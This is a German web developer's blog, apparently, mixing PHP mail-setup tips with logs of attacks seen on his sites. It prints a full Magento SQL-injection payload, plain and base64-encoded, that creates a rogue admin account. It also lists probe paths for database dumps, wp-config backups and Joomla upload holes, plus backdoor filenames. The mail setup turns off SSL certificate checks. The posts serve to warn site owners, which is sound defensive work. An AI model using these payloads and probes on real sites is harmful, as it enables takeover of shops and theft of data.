cakephp mail versand gmail xampp

Um eine eMail von einem Xampp System mit cakephp 3 und gmail zu verschicken folgende Einstellung benutzen

'gmail' => [
            'host' => 'ssl://smtp.gmail.com',
            'port' => 465,
            'username' => 'username',
            'password' => '****',
            'timeout' => 60,
            'className' => 'Smtp',
            'tls' => false,
            'log' => true,
            'context' => [
                'ssl' => [
                    'verify_peer' => false,
                    'verify_peer_name' => false,
                    'allow_self_signed' => true
                ]
            ]
        ],

Im gmail Konto muss zusätzlich „Weniger sichere Apps zulassen“ auf „an“ stehen

typische Magento Angriffe

mittlerweile typische, automatisierte Angriffe auf Magento Systeme

parameter sind base_64 encoded

{{block type="adminhtml/report_search_grid"}} num_results[from]=0&num_results[field_expr]=1=2);DELETE FROM `admin_user` WHERE user_id = ; DELETE FROM `admin_role` WHERE user_id = ; INSERT INTO `admin_user` (`user_id`, `firstname`, `lastname`, `email`, `username`, `password`, `created`, `modified`, `logdate`, `lognum`, `reload_acl_flag`, `is_active`, `extra`) VALUES (,'firstname', 'lastname', 'mail', 'username', 'pwd', 'null', 'null', 'null', 1, 0, 1, 'N;'); INSERT INTO `admin_role` (`parent_id`, `tree_level`, `sort_order`, `role_type`, `user_id`, `role_name`) VALUES (1, 2, 0, 'U', , 'magent');; --

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/index.php/admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VyX2lkID0gMzU7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDM1OyAgSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRgLCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgYGV4dHJhYCkgVkFMVUVTICAoMzUsJ2JhY2t1cCcsICdjcmV3JywgJ2JhY2t1cEBtYWdlbnRvcy5jb20nLCAnYmxhY2t1bml4JywgJ2M0Yjg3MTcwYjg5YTc2MzQwNzNmZGE3YTFjMzZlMTAxJywgJ251bGwnLCAnbnVsbCcsICdudWxsJywgMSwgMCwgMSwgJ047Jyk7ICBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLCBgdHJlZV9sZXZlbGAsIGBzb3J0X29yZGVyYCwgYHJvbGVfdHlwZWAsIGB1c2VyX2lkYCwgYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwgMiwgMCwgJ1UnLCAzNSwgJ21hZ2VudCcpOzsgLS0g

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/downloader/

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ//js/webforms/logic.js

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/app/etc/local.xml

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ//js/webforms/logic.js

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/api/xmlrpc

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ//js/webforms/logic.js

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/skin/error.php

GET /robots.txt&sa=U&ved=0ahUKEwi88-aC5NHTAhWJnBoKHddTCkUQFgjmATAn&usg=AFQjCNH-aK-oXiNkdlyLrjz9XjMI8DnCzQ/skin/upil.php

GET /index.php/admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VyX2lkID0gMzU7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDM1OyAgSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRgLCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgYGV4dHJhYCkgVkFMVUVTICAoMzUsJ2JhY2t1cCcsICdjcmV3JywgJ2JhY2t1cEBtYWdlbnRvcy5jb20nLCAnYmxhY2t1bml4JywgJ2M0Yjg3MTcwYjg5YTc2MzQwNzNmZGE3YTFjMzZlMTAxJywgJ251bGwnLCAnbnVsbCcsICdudWxsJywgMSwgMCwgMSwgJ047Jyk7ICBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLCBgdHJlZV9sZXZlbGAsIGBzb3J0X29yZGVyYCwgYHJvbGVfdHlwZWAsIGB1c2VyX2lkYCwgYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwgMiwgMCwgJ1UnLCAzNSwgJ21hZ2VudCcpOzsgLS0g

GET /downloader/

GET //js/webforms/logic.js

GET /app/etc/local.xml

GET //js/webforms/logic.js

GET /api/xmlrpc

POST /api/xmlrpc

GET //js/webforms/logic.js

GET /skin/error.php

GET /skin/upil.php

Downloadversuch von Datenbankdumps

Bei einem Kunden fand ich den Versuch auf unten stehende Dateien zuzugreifen.(Müßten so um die 300 sein)

Jeder Versuch hatte eine andere IP Adresse und wurde mit einem Abstand von 5-6 Sekunden durchgeführt. Ist also mit den klassischen 404 Fehler/IP Blockingmethoden nicht zu stoppen.
Schaut man sich die Endungen der Dateien an, dann sieht man, dass im Prinzip ein variabler Begriff 1,backup,data, db etc mit den Endungen sql,7z,bz2,gz,rar,tar,tar.bz2,tar.bzip2,tar.gz,tgz,zip durchprobiert wird. Höchstwahrscheinlich flexibel erweiterbar. Ist also nur eine Zeitfrage, bis auch div. Ordnernamen hinzukommen.

/1.sql
/1.sql.7z
/1.sql.bz2
/1.sql.gz
/1.sql.rar
/1.sql.tar
/1.sql.tar.bz2
/1.sql.tar.bzip2
/1.sql.tar.gz
/1.sql.tar.gzip
/1.sql.tgz
/1.sql.zip
/backup.sql
/backup.sql.7z
/backup.sql.bz2
/backup.sql.gz
/backup.sql.rar
/backup.sql.sql
/backup.sql.tar
/backup.sql.tar.bz2
/backup.sql.tar.bzip2
/backup.sql.tar.gz
/backup.sql.tar.gzip
/backup.sql.tgz
/backup.sql.zip
/data.sql
/data.sql.7z
/data.sql.bz2
/data.sql.gz
/data.sql.rar
/data.sql.sql
/data.sql.tar
/data.sql.tar.bz2
/data.sql.tar.bzip2
/data.sql.tar.gz
/data.sql.tar.gzip
/data.sql.tgz
/data.sql.zip
/db.7z
/db.bz2
/db.gz
/db.rar
/db.sql
/db.sql.7z
/db.sql.bz2
/db.sql.gz
/db.sql.rar
/db.sql.sql
/db.sql.tar
/db.sql.tar.bz2
/db.sql.tar.bzip2
/db.sql.tar.gz
/db.sql.tar.gzip
/db.sql.tgz
/db.sql.zip
/db.tar
/db.tar.bz2
/db.tar.bzip2
/db.tar.gz
/db.tar.gzip
/db.tgz
/db.zip
/db_backup.7z
/db_backup.bz2
/db_backup.gz
/db_backup.rar
/db_backup.sql
/db_backup.sql.7z
/db_backup.sql.bz2
/db_backup.sql.gz
/db_backup.sql.rar
/db_backup.sql.sql
/db_backup.sql.tar
/db_backup.sql.tar.bz2
/db_backup.sql.tar.bzip2
/db_backup.sql.tar.gz
/db_backup.sql.tar.gzip
/db_backup.sql.tgz
/db_backup.sql.zip
/db_backup.tar
/db_backup.tar.bz2
/db_backup.tar.bzip2
/db_backup.tar.gz
/db_backup.tar.gzip
/db_backup.tgz
/db_backup.zip
/dbadmin.sql
/dbadmin.tgz
/dbase.rar
/dbase.sql.7z
/dbase.sql.bz2
/dbase.sql.gz
/dbase.sql.rar
/dbase.sql.sql
/dbase.sql.tar
/dbase.sql.tar.bz2
/dbase.sql.tar.bzip2
/dbase.sql.tar.gz
/dbase.sql.tar.gzip
/dbase.sql.tgz
/dbase.sql.zip
/dbase.tar.gz
/dbase.tar.gzip
/dbase.zip
/dbdump.7z
/dbdump.bz2
/dbdump.gz
/dbdump.rar
/dbdump.sql
/dbdump.sql.7z
/dbdump.sql.bz2
/dbdump.sql.gz
/dbdump.sql.rar
/dbdump.sql.sql
/dbdump.sql.tar
/dbdump.sql.tar.bz2
/dbdump.sql.tar.bzip2
/dbdump.sql.tar.gz
/dbdump.sql.tar.gzip
/dbdump.sql.tgz
/dbdump.sql.zip
/dbdump.tar
/dbdump.tar.bz2
/dbdump.tar.bzip2
/dbdump.tar.gz
/dbdump.tar.gzip
/dbdump.tgz
/dbdump.zip
/dump.7z
/dump.bz2
/dump.gz
/dump.rar
/dump.sql
/dump.sql.7z
/dump.sql.bz2
/dump.sql.gz
/dump.sql.rar
/dump.sql.tar
/dump.sql.tar.bz2
/dump.sql.tar.bzip2
/dump.sql.tar.gz
/dump.sql.tar.gzip
/dump.sql.tgz
/dump.sql.zip
/dump.tar
/dump.tar.bz2
/dump.tar.bzip2
/dump.tar.gz
/dump.tar.gzip
/dump.tgz
/dump.zip
/home.sql
/home.sql.7z
/home.sql.bz2
/home.sql.gz
/home.sql.rar
/home.sql.sql
/home.sql.tar
/home.sql.tar.bz2
/home.sql.tar.bzip2
/home.sql.tar.gz
/home.sql.tar.gzip
/home.sql.tgz
/home.sql.zip
/htm/leist.html
/htm/links.htm
/htm/lorsche.html
/mysql.7z
/mysql.bz2
/mysql.gz
/mysql.rar
/mysql.sql
/mysql.sql.7z
/mysql.sql.bz2
/mysql.sql.gz
/mysql.sql.rar
/mysql.sql.tar
/mysql.sql.tar.bz2
/mysql.sql.tar.bzip2
/mysql.sql.tar.gz
/mysql.sql.tar.gzip
/mysql.sql.tgz
/mysql.sql.zip
/mysql.tar
/mysql.tar.bz2
/mysql.tar.bzip2
/mysql.tar.gz
/mysql.tar.gzip
/mysql.tgz
/mysql.zip
/public_html.sql
/site.sql
/site.sql.7z
/site.sql.bz2
/site.sql.gz
/site.sql.rar
/site.sql.tar
/site.sql.tar.bz2
/site.sql.tar.bzip2
/site.sql.tar.gz
/site.sql.tar.gzip
/site.sql.tgz
/site.sql.zip
/sql.7z
/sql.bz2
/sql.gz
/sql.rar
/sql.sql
/sql.sql.7z
/sql.sql.bz2
/sql.sql.gz
/sql.sql.rar
/sql.sql.tar
/sql.sql.tar.bz2
/sql.sql.tar.bzip2
/sql.sql.tar.gz
/sql.sql.tar.gzip
/sql.sql.tgz
/sql.sql.zip
/sql.tar
/sql.tar.bz2
/sql.tar.bzip2
/sql.tar.gz
/sql.tar.gzip
/sql.tgz
/sql.zip
/temp.sql
/temp.sql.7z
/temp.sql.bz2
/temp.sql.gz
/temp.sql.rar
/temp.sql.tar
/temp.sql.tar.bz2
/temp.sql.tar.bzip2
/temp.sql.tar.gz
/temp.sql.tar.gzip
/temp.sql.tgz
/temp.sql.zip
/upload.sql
/upload.sql.7z
/upload.sql.bz2
/upload.sql.gz
/upload.sql.rar
/upload.sql.tar
/upload.sql.tar.bz2
/upload.sql.tar.bzip2
/upload.sql.tar.gz
/upload.sql.tar.gzip
/upload.sql.tgz
/upload.sql.zip
/users.7z
/users.bz2
/users.gz
/users.rar
/users.sql
/users.sql.7z
/users.sql.bz2
/users.sql.gz
/users.sql.rar
/users.sql.tar
/users.sql.tar.bz2
/users.sql.tar.bzip2
/users.sql.tar.gz
/users.sql.tar.gzip
/users.sql.tgz
/users.sql.zip
/users.tar
/users.tar.bz2
/users.tar.bzip2
/users.tar.gz
/users.tar.gzip
/users.tgz
/users.zip
/web.sql
/web.sql.7z
/web.sql.bz2
/web.sql.gz
/web.sql.rar
/web.sql.tar
/web.sql.tar.bz2
/web.sql.tar.bzip2
/web.sql.tar.gz
/web.sql.tar.gzip
/web.sql.tgz
/web.sql.zip
/www.sql
/www.sql.7z
/www.sql.bz2
/www.sql.gz
/www.sql.rar
/www.sql.sql
/www.sql.tar
/www.sql.tar.bz2
/www.sql.tar.bzip2
/www.sql.tar.gz
/www.sql.tar.gzip
/www.sql.tgz
/www.sql.zip

Ein Rootverzeichnis sollte aufgeräumt sein

Ich habe es ja schon mehrfach geschrieben, aber da das hier fast täglich passiert noch mal der Hinweis.

Ein Rootverzeichnis sollte aufgeräumt sein, umbenennen funktioniert nicht


//e-world.de/wp-config.htm
//e-world.de/wp-config.html
//e-world.de/wp-config.local.php
//e-world.de/wp-config.prod.php.txt
//e-world.de/wp-config-sample.php~
//e-world.de/config.php~~
//e-world.de/wp-config.cfg
//e-world.de/wp-config%0
//e-world.de/config.
//e-world.de/wp-config.backup
//e-world.de/wp-config.data
//e-world.de/config.php~
//www.e-world.de/config.old
//e-world.de/config.old
//www.e-world.de/config.bak
//e-world.de/config.bak
//www.e-world.de/wp-config-backup
//e-world.de/wp-config-backup
//e-world.de/wp-config-backup.txt
//www.e-world.de/wp-config.
//e-world.de/wp-config.
//www.e-world.de/config
//e-world.de/config
//www.e-world.de/wp-config.old
//e-world.de/wp-config.old
//www.e-world.de/wp-config.txt
//e-world.de/wp-config.txt
//www.e-world.de/wp-config.bak
//e-world.de/wp-config.bak
//www.e-world.de/wp-config%0fix.txt
//e-world.de/wp-config%0fix.txt
//www.e-world.de/wp-config-backup.txt
//e-world.de/wp-config-backup.txt

SMTP TLS Mailversand mit Swiftmailer bei Strato und 1und1

Für ein Projekt war es wichtig, dass ich einen Mailversand per SMTP und TLS hinbekomme.

Das Projekt lief bei Strato. Getestet habe ich allerdings bei meinem Homeprovider 1und1.

Nach diversen Versuchen und permanenten „SMTP connect() failed.“ in den unterschiedlichsten Konfigurationen, dämmerte mir dann irgendwann, dass 1und1 anscheinend die Verbindung auf Shared Systemen blockt bzw nicht zulässt. Getestet habe ich das mir 1und1, Gmail und Strato als Host.

Für Strato, auf einem Stratowebserver, allerdings funktionieren folgenden Einstellungen.


require_once __DIR__ . '/swiftmailer/lib/swift_required.php';

define('USER', 'account');
define('PASSWORD', 'xxx');
define('HOST', 'smtp.strato.de');
define('PORT', 587);
define('SECURE', 'TLS');
define('FROM', 'mail@adr.de');
define('TO', 'other-mail@adr.de');
define('TOALIAS', 'Alias');
define('FROMALIAS', 'From Alias');
define('SUBJECT', 'Subject');
$body ="...Text...";
$alt_body="Text";

$transport = Swift_SmtpTransport::newInstance()
->setHost(HOST)
->setPort(PORT)
->setEncryption(SECURE)
->setUsername(USER)
->setPassword(PASSWORD);

$mailer = Swift_Mailer::newInstance($transport);
$message = Swift_Message::newInstance(SUBJECT)
->setFrom(array(FROM => FROMALIAS))
->setTo(array(TO => TOALIAS))
->setBody($alt_body)
->addPart($body, 'text/html');

if (!$mailer->send($message, $failures)) {
return false;
} else {
return true;
}

Hier habe ich Swiftmailer genommen, es sollte unter der Prämisse Strato aber auch per PHPMailer funktionieren.

Nach Goethes Zauberlehrling

Nicht nur das es ausreicht auf einer Website über ein Thema zu schreiben (Magento), nein, wenn bestimmte Wörter einfach nur fallen, wie .libs .php oder bogel .php, dann kommen die „Geister“

Mittlerweile im minutentakt finde ich Aufrufe aus der halben Welt, die nach besagten Dateien suchen.

Ich habe etwas über Joomla geschrieben, prompt kommen Angriffe, die auf Joomla Schwachstellen abzielen. Magento? Siehe oben.

Ich stelle mal die These auf, das es für die wirklichen Könner ein lukratives Geschäft ist, ihre Skripte an Interessierte anderer Kategorien zu vertreiben. Diese schauen ja gar nicht, ob A oder B wirklich installiert ist. Domain ins Skript eingetragen und dann durchtesten, irgendwann wird schon etwas passieren.

Allerdings, wie wird man diese Geister wieder los?

Selbst, wenn Themen gelöscht werden, in irgendwelchen Datenbanken scheint man dann wohl gelistet zu sein auf immer und ewig.

Verdächtige Dateien

Falls jemand u.g. Dateien in seinem System findet, dann wurde eine Backdoor platziert.

cilik.php
jahat.php
fatal.php
budak.php
demit.php
reload-x.pHp
.libs.php
406.php
wp-linknet.php
magic.php
indo.php
indeks.php
ramz.pHp
xGSx.php
bogel.php
myluph.php
polahi.php

Viele Angriffe probieren immer wieder auf diese oder ähnliche Dateien zuzugreifen.

So nach dem Motto, evtl hat ja schon jemand geschafft. Also, guter Rat, sichert euer System ab, so gut es eben geht. Wenn auch ein 100% Schutz meiner Meinung nach kaum möglich ist.

Joomla Angriffe

Hier wird nicht geschaut, ob Joomla überhaupt läuft, es wird einfach drauflos probiert

Anscheinend ist in ‚php-ofc-library‘ ein Bug enthalten und alle Packages die diese Bibliothek nutzen sind damit angreifbar.

/index.php?option=com_search
//cfg-contactform-16/inc/upload.php
/index.php?option=com_adsmanager&task=upload&tmpl=component
//cfg-contactform-15/inc/upload.php
//cfg-contactform-14/inc/upload.php
//cfg-contactform-13/inc/upload.php
//cfg-contactform-12/inc/upload.php
//cfg-contactform-11/inc/upload.php
/components/com_creativecontactform/fileupload/index.php
//cfg-contactform-10/inc/upload.php
//cfg-contactform-9/inc/upload.php
//cfg-contactform-8/inc/upload.php
//cfg-contactform-7/inc/upload.php
//cfg-contactform-6/inc/upload.php
/components/com_sexycontactform/fileupload/index.php
//cfg-contactform-5/inc/upload.php
//cfg-contactform-4/inc/upload.php
//cfg-contactform-3/inc/upload.php
//cfg-contactform-2/inc/upload.php
//cfg-contactform-1/inc/upload.php
/index.php?option=com_jdownloads&Itemid=0&view=upload
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php
/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php
/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php
/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php
/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php
/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php
/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php
/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php
/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php
/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php
/images/stories/pbot.php
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php
/images/stories/mil.gif
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
/components/com_hdflvplayer/hdflvplayer/download.php?f=..%2F..%2F..%2Fconfiguration.php
/?option=com_search
/index.php?option=com_search

Upload Attacke

Hier versucht der Angreifer auf meinen Server hochzuladen. Eine Sekunde später wird sofort probiert, ob die hochgeladene Datei abgerufen werden kann. Als Referrer wird der Googlebot angegeben.


xxx.xxx.xxx.xxx - - [13/Jun/2016:11:26:17 +0200] "POST / HTTP/1.1" 403 226 www.e-world.de "https://www.e-world.de/" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0" "-"
xxx.xxx.xxx.xxx - - [13/Jun/2016:11:26:18 +0200] "GET /wp-content/uploads/wpconf.php HTTP/1.1" 404 - www.e-world.de "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

xxx.xxx.xxx.xxx - - [13/Jun/2016:11:26:22 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 226 www.e-world.de "https://www.e-world.de/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0" "-"
xxx.xxx.xxx.xxx - - [13/Jun/2016:11:26:23 +0200] "GET /wp-content/plugins/revslider/temp/update_extract/wpconf.php HTTP/1.1" 503 1363 www.e-world.de "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

xxx.xxx.xxx.xxx - - [13/Jun/2016:11:26:35 +0200] "POST /sites/all/libraries/elfinder/php/connector.minimal.php HTTP/1.1" 403 226 www.e-world.de "https://www.e-world.de/sites/all/libraries/elfinder/php/connector.minimal.php" "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0" "-"
xxx.xxx.xxx.xxx - - [13/Jun/2016:11:26:35 +0200] "GET /sites/all/libraries/elfinder/files/wpconf.php HTTP/1.1" 404 13534 www.e-world.de "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"